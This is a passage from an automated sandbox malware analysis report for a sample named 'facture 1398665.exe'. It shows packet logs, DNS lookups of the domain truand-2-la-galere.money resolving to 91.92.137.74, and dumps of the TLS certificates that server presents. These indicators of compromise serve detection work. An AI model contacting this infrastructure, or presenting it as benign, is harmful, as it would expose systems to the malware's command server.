Mai 7, 2018 14:50:47.271351099 MESZ 443 49189 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:47.791723013 MESZ 443 49189 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:47.791856050 MESZ 49189 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:47.811377048 MESZ 49189 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:47.811405897 MESZ 443 49189 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:47.820873022 MESZ 49189 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:47.820899010 MESZ 443 49189 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:48.010346889 MESZ 443 49189 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:48.010482073 MESZ 49189 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:48.010504007 MESZ 443 49189 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:48.011492014 MESZ 49189 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:48.011513948 MESZ 443 49189 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:48.012744904 MESZ 49189 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:48.018305063 MESZ 49189 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:48.018416882 MESZ 443 49189 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:48.018771887 MESZ 49189 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:48.928998947 MESZ 49190 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:48.929069042 MESZ 443 49190 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:48.929173946 MESZ 49190 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:48.931030035 MESZ 49190 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:48.931071043 MESZ 443 49190 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:49.664684057 MESZ 443 49190 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:49.664966106 MESZ 49190 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:49.677887917 MESZ 49190 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:49.677946091 MESZ 443 49190 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:49.689505100 MESZ 49190 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:49.689567089 MESZ 443 49190 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:50.074315071 MESZ 443 49190 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:50.074546099 MESZ 49190 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:50.074569941 MESZ 443 49190 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:50.074904919 MESZ 49190 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:50.074923038 MESZ 443 49190 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:50.075151920 MESZ 49190 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:50.075867891 MESZ 443 49190 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:50.076056957 MESZ 49190 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:50.076527119 MESZ 49190 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:50.190388918 MESZ 49191 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:50.190455914 MESZ 443 49191 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:50.190851927 MESZ 49191 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:50.192337036 MESZ 49191 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:50.192364931 MESZ 443 49191 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:50.945594072 MESZ 443 49191 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:50.945775986 MESZ 49191 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:50.955214024 MESZ 49191 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:50.955250025 MESZ 443 49191 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:50.961288929 MESZ 49191 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:50.961308956 MESZ 443 49191 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:51.156411886 MESZ 443 49191 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:51.156567097 MESZ 49191 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:51.156590939 MESZ 443 49191 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:51.158535004 MESZ 49191 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:51.158560991 MESZ 443 49191 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:51.159035921 MESZ 49191 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:51.198120117 MESZ 49191 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:51.198335886 MESZ 443 49191 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:51.199059963 MESZ 49191 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:51.312700033 MESZ 49192 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:51.312755108 MESZ 443 49192 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:51.313134909 MESZ 49192 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:51.314320087 MESZ 49192 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:51.314342022 MESZ 443 49192 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:51.890517950 MESZ 443 49192 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:51.890738964 MESZ 49192 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:51.901772976 MESZ 49192 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:51.901823044 MESZ 443 49192 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:51.908782005 MESZ 49192 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:51.908830881 MESZ 443 49192 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:52.412897110 MESZ 443 49192 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:52.413130045 MESZ 49192 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:52.413157940 MESZ 443 49192 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:52.422863960 MESZ 49192 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:52.493799925 MESZ 49192 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:52.493969917 MESZ 443 49192 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:52.495106936 MESZ 49192 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:52.609344959 MESZ 49193 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:52.609399080 MESZ 443 49193 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:52.609464884 MESZ 49193 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:52.610738993 MESZ 49193 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:52.610765934 MESZ 443 49193 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:53.250790119 MESZ 443 49193 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:53.250953913 MESZ 49193 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:53.265822887 MESZ 49193 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:53.265882969 MESZ 443 49193 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:53.273247957 MESZ 49193 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:53.273288012 MESZ 443 49193 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:53.728907108 MESZ 443 49193 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:53.729120970 MESZ 49193 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:53.729161978 MESZ 443 49193 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:53.729557991 MESZ 49193 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:53.729783058 MESZ 49193 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:53.730365038 MESZ 443 49193 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:53.730714083 MESZ 49193 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:53.855282068 MESZ 49194 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:53.855324984 MESZ 443 49194 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:53.855428934 MESZ 49194 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:53.856668949 MESZ 49194 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:53.856698990 MESZ 443 49194 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:54.925281048 MESZ 443 49194 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:54.925368071 MESZ 49194 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:54.938718081 MESZ 49194 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:54.938743114 MESZ 443 49194 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:54.945447922 MESZ 49194 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:54.945472956 MESZ 443 49194 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:55.191068888 MESZ 443 49194 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:55.191190004 MESZ 49194 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:55.191232920 MESZ 443 49194 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:55.191405058 MESZ 49194 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:55.192166090 MESZ 49194 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:55.192390919 MESZ 443 49194 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:55.192502975 MESZ 49194 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:55.318171978 MESZ 49195 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:55.318217993 MESZ 443 49195 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:55.318279982 MESZ 49195 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:55.319441080 MESZ 49195 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:55.319463968 MESZ 443 49195 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:56.210407972 MESZ 443 49195 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:56.210563898 MESZ 49195 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:56.471676111 MESZ 49195 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:56.471713066 MESZ 443 49195 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:56.478312016 MESZ 49195 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:56.478332043 MESZ 443 49195 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:57.055716991 MESZ 443 49195 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:57.055952072 MESZ 49195 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:57.055994987 MESZ 443 49195 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:57.056631088 MESZ 49195 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:57.057097912 MESZ 49195 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:57.057305098 MESZ 443 49195 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:57.058098078 MESZ 49195 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:57.177575111 MESZ 49196 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:57.177628040 MESZ 443 49196 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:57.177721977 MESZ 49196 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:57.179027081 MESZ 49196 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:57.179055929 MESZ 443 49196 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:58.508421898 MESZ 443 49196 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:58.508632898 MESZ 49196 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:58.520298004 MESZ 49196 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:58.520328045 MESZ 443 49196 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:58.526592016 MESZ 49196 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:58.526619911 MESZ 443 49196 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:59.078972101 MESZ 443 49196 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:59.079241037 MESZ 49196 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:59.079272032 MESZ 443 49196 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:59.079611063 MESZ 49196 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:59.079823971 MESZ 49196 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:59.080403090 MESZ 443 49196 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:59.080718040 MESZ 49196 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:59.191762924 MESZ 49197 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:59.191813946 MESZ 443 49197 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:59.192903042 MESZ 49197 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:59.194086075 MESZ 49197 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:59.194116116 MESZ 443 49197 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:00.519529104 MESZ 443 49197 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:00.519761086 MESZ 49197 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:00.536766052 MESZ 49197 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:00.536802053 MESZ 443 49197 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:00.543488026 MESZ 49197 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:00.543520927 MESZ 443 49197 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:01.176707029 MESZ 443 49197 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:01.176886082 MESZ 49197 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:01.176939964 MESZ 443 49197 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:01.182810068 MESZ 49197 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:01.183203936 MESZ 49197 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:01.183348894 MESZ 443 49197 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:01.183465958 MESZ 49197 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:01.310216904 MESZ 49198 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:01.310261011 MESZ 443 49198 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:01.310373068 MESZ 49198 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:01.311722994 MESZ 49198 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:01.311755896 MESZ 443 49198 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:02.977124929 MESZ 443 49198 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:02.977395058 MESZ 49198 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:02.990880966 MESZ 49198 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:02.990916967 MESZ 443 49198 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:02.997071028 MESZ 49198 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:02.997104883 MESZ 443 49198 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:03.341708899 MESZ 443 49198 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:03.341903925 MESZ 49198 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:03.341964960 MESZ 443 49198 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:03.342415094 MESZ 49198 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:03.342776060 MESZ 49198 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:03.343168020 MESZ 443 49198 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:03.343286037 MESZ 49198 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:03.457916021 MESZ 49199 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:03.457973003 MESZ 443 49199 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:03.458036900 MESZ 49199 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:03.459322929 MESZ 49199 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:03.459357023 MESZ 443 49199 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:05.012702942 MESZ 443 49199 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:05.012825012 MESZ 49199 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:05.025315046 MESZ 49199 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:05.025341988 MESZ 443 49199 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:05.032085896 MESZ 49199 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:05.032113075 MESZ 443 49199 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:05.340399027 MESZ 443 49199 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:05.340635061 MESZ 49199 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:05.340677023 MESZ 443 49199 91.92.137.74 192.168.1.81

Mai 7, 2018 14:51:05.341181040 MESZ 49199 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:51:05.341511965 MESZ 49199 443 192.168.1.81 91.92.137.74


Copyright Joe Security LLC 2018 Page 55 of 149


Timestamp Source Port Dest Port Source IP Dest IP

Mai 7, 2018 14:49:36.631899118 MESZ 63700 53 192.168.1.81 8.8.8.8

Mai 7, 2018 14:49:36.814659119 MESZ 53 63700 8.8.8.8 192.168.1.81

Mai 7, 2018 14:49:50.485364914 MESZ 54244 53 192.168.1.81 8.8.8.8

Mai 7, 2018 14:49:50.615817070 MESZ 53 54244 8.8.8.8 192.168.1.81

Mai 7, 2018 14:49:50.626178980 MESZ 60413 53 192.168.1.81 8.8.8.8

Mai 7, 2018 14:49:50.746747017 MESZ 53 60413 8.8.8.8 192.168.1.81

Mai 7, 2018 14:49:57.409387112 MESZ 49912 53 192.168.1.81 8.8.8.8

Mai 7, 2018 14:49:57.457447052 MESZ 53 49912 8.8.8.8 192.168.1.81

Mai 7, 2018 14:49:59.604815960 MESZ 62993 53 192.168.1.81 8.8.8.8

Mai 7, 2018 14:49:59.656533003 MESZ 53 62993 8.8.8.8 192.168.1.81

Mai 7, 2018 14:49:59.668673992 MESZ 58780 53 192.168.1.81 8.8.8.8

Mai 7, 2018 14:49:59.710364103 MESZ 53 58780 8.8.8.8 192.168.1.81

Mai 7, 2018 14:50:20.956351995 MESZ 54934 53 192.168.1.81 8.8.8.8

Mai 7, 2018 14:50:21.522135973 MESZ 53 54934 8.8.8.8 192.168.1.81

Mai 7, 2018 14:50:21.526216030 MESZ 62845 53 192.168.1.81 8.8.8.8

Mai 7, 2018 14:50:21.625046015 MESZ 53 62845 8.8.8.8 192.168.1.81

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Mai 7, 2018 14:49:36.631899118 MESZ 192.168.1.81 8.8.8.8 0xe63b Standard query (0)

truand-2-la-galere.money

A (IP address) IN (0x0001)

Mai 7, 2018 14:49:57.409387112 MESZ 192.168.1.81 8.8.8.8 0xe65e Standard query (0)

truand-2-la-galere.money

A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID Replay Code Name CName Address Type Class

Mai 7, 2018 14:49:36.814659119 MESZ

8.8.8.8 192.168.1.81 0xe63b No error (0) truand-2-la-galere.money

91.92.137.74 A (IP address) IN (0x0001)

Mai 7, 2018 14:49:57.457447052 MESZ

8.8.8.8 192.168.1.81 0xe65e No error (0) truand-2-la-galere.money

91.92.137.74 A (IP address) IN (0x0001)

truand-2-la-galere.money

TimestampSourcePort

DestPort Source IP Dest IP Subject Issuer

NotBefore

NotAfter Raw

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Packets

Copyright Joe Security LLC 2018 Page 61 of 149

Page 62: Automated Malware Analysis Report for facture 1398665.exe ...Contains functionality to adjust token privileges (e.g. debug / backup) Contains functionality to check free disk space

Timestamp:    May 7, 2018 14:49:49.415469885 CEST
Source Port:  443
Dest Port:    49162
Source IP:    91.92.137.74
Dest IP:      192.168.1.81
Subject:      CN=truand-2-la-galere.money
Issuer:       CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
NotBefore:    Sun May 06 14:49:49 CEST 2018
NotAfter:     Mon May 06 14:49:49 CEST 2019
Raw:
  Version: V3
  Subject: CN=truand-2-la-galere.money
  Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5
  Key: Sun RSA public key, 1024 bits
    modulus: 173482083284325052510782864429137664633579691511543703039539002342296275109238117625872040139262896379538795260129849870433580344922031107699417419151540910326435169336338847748055467257593289358534582447761859028139174157241477124077669012417476784832342735303634755439494836929402863720187668290571419613987
    public exponent: 3
  Validity: From Sun May 06 14:49:49 CEST 2018, To Mon May 06 14:49:49 CEST 2019
  Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
  SerialNumber: 0311340b 93cf92e2 c28a4c49 0bc38176 5929
  Certificate Extensions: 6
    [1] 2.5.29.35 AuthorityKeyIdentifier (Criticality=false)
        KeyIdentifier: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 F6 11 6B 3A
        Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
        SerialNumber: d21ef1f6 e34f6bb8
    [2] 2.5.29.19 BasicConstraints (Criticality=false): CA:false, PathLen: undefined
    [3] 2.5.29.37 ExtendedKeyUsages (Criticality=false): serverAuth
    [4] 2.5.29.15 KeyUsage (Criticality=false): DigitalSignature, Key_Encipherment
    [5] 2.5.29.17 SubjectAlternativeName (Criticality=false): DNSName: truand-2-la-galere.money
    [6] 2.5.29.14 SubjectKeyIdentifier (Criticality=false)
        KeyIdentifier: E7 21 6A 88 08 3C 29 7D AE FF C8 DF 28 2B DB 46 8D F2 7E 77
  Algorithm: SHA1withRSA
  Signature (512 bytes, hex; the ASCII gutter of the original dump is omitted):
    0000: 4D A4 34 D2 89 ED AD CF EE 3C 67 50 EE D2 A2 20
    0010: A3 07 52 C5 77 53 1A 87 74 49 50 8F 36 17 08 DD
    0020: 5E 05 16 D8 18 1C AF 71 E2 02 D3 0F FD 70 94 51
    0030: 15 86 58 D2 E1 A4 11 54 6F F4 5E 8F BA CD F6 FF
    0040: EB AA 07 0E EF 33 E2 0F D9 35 0B 68 C2 71 85 F5
    0050: 12 EC EE A2 40 47 2E 35 7F 33 28 AD B8 3D 9E FB
    0060: F0 ED 92 7A 55 5E B4 F3 98 C6 41 F0 94 D1 49 77
    0070: 3D 2A 5A 99 4E 3B 9D A1 88 E0 35 97 4E B5 A6 2C
    0080: 5E 91 5C 15 73 45 86 16 30 91 91 79 42 00 99 C5
    0090: BC 54 D1 02 88 91 CE 7F DA 85 1B DC 37 E8 9A F6
    00A0: F5 EA 72 2D A2 AC 28 09 30 9E 9B 32 57 30 5F EF
    00B0: 99 02 FA 13 55 00 7B 98 AE ED 09 99 9E 5E 03 51
    00C0: 13 30 22 05 00 66 8C AE 01 D7 7E 85 49 FE 5B AB
    00D0: B8 88 95 CE F9 54 13 36 9C BC 44 9C 55 C6 01 C0
    00E0: 91 FD FC F9 13 FA FA BE CD F2 38 FD 80 CD D8 FA
    00F0: 67 45 3E 65 12 1C 04 EF 86 4A C2 C7 21 FC 59 D9
    0100: BC 07 2C 8F 92 AC E2 89 04 19 C2 0A 14 5B 93 BF
    0110: 3C 07 EA B8 35 A9 37 09 0A BC ED CF FB DE 67 EF
    0120: F3 9A 5B 28 17 71 24 61 DB 36 5E D3 11 1A 9D 13
    0130: 81 88 00 73 BF 6A E7 39 0E 50 97 7B C3 8A 13 65
    0140: 07 6A 37 63 8E 35 61 71 6A 92 F1 13 EE 77 FD F6
    0150: 80 B0 D8 DA A5 43 4E 8E 4A 54 C0 DF 4C 8F 82 73
    0160: F7 63 13 26 09 31 04 F8 D7 43 A0 8D F1 B9 53 2B
    0170: 42 06 C6 50 70 E1 85 54 B7 F8 EB 2A C1 E2 91 9A
    0180: 42 FB AA 11 3A 2F DB 95 D1 69 4C 76 A0 75 CE 23
    0190: 56 6E B0 01 AC 84 08 46 5C 96 33 A7 E9 4B 19 B2
    01A0: 59 10 12 45 56 A1 52 72 52 EC 25 77 D4 2F E8 16
    01B0: AB 73 3B F2 8C AE AF C0 8E 30 52 37 7E 59 7F C3
    01C0: EB 01 83 A0 98 0A 8A 13 84 F9 8C D9 6A 18 10 5D
    01D0: 24 D9 88 D9 51 73 19 C3 5E 0C 15 9D 1C 78 8B D5
    01E0: F0 A9 74 F1 28 58 23 BD 44 CC 2D B3 CE E2 46 57
    01F0: BF 4D D8 6C 38 09 8C 5F CD 30 6A C0 3A 86 77 DF


Timestamp:    May 7, 2018 14:49:49.415469885 CEST
Source Port:  443
Dest Port:    49162
Source IP:    91.92.137.74
Dest IP:      192.168.1.81
Subject:      CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
Issuer:       CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
NotBefore:    Tue Mar 17 15:16:38 CET 2015
NotAfter:     Thu Mar 09 15:16:38 CET 2045
Raw:
  Version: V3
  Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
  Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5
  Key: Sun RSA public key, 4096 bits
    modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309
    public exponent: 65537
  Validity: From Tue Mar 17 15:16:38 CET 2015, To Thu Mar 09 15:16:38 CET 2045
  Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
  SerialNumber: d21ef1f6 e34f6bb8
  Certificate Extensions: 3
    [1] 2.5.29.35 AuthorityKeyIdentifier (Criticality=false)
        KeyIdentifier: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 F6 11 6B 3A
    [2] 2.5.29.19 BasicConstraints (Criticality=false): CA:true, PathLen: 2147483647
    [3] 2.5.29.14 SubjectKeyIdentifier (Criticality=false)
        KeyIdentifier: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 F6 11 6B 3A
  Algorithm: SHA1withRSA
  Signature (512 bytes, hex; the ASCII gutter of the original dump is omitted):
    0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20
    0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79
    0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE
    0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD
    0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F
    0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E
    0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD
    0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0
    0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53
    0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2
    00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28
    00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30
    00C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0
    00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54
    00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5
    00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43
    0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29
    0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3
    0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56
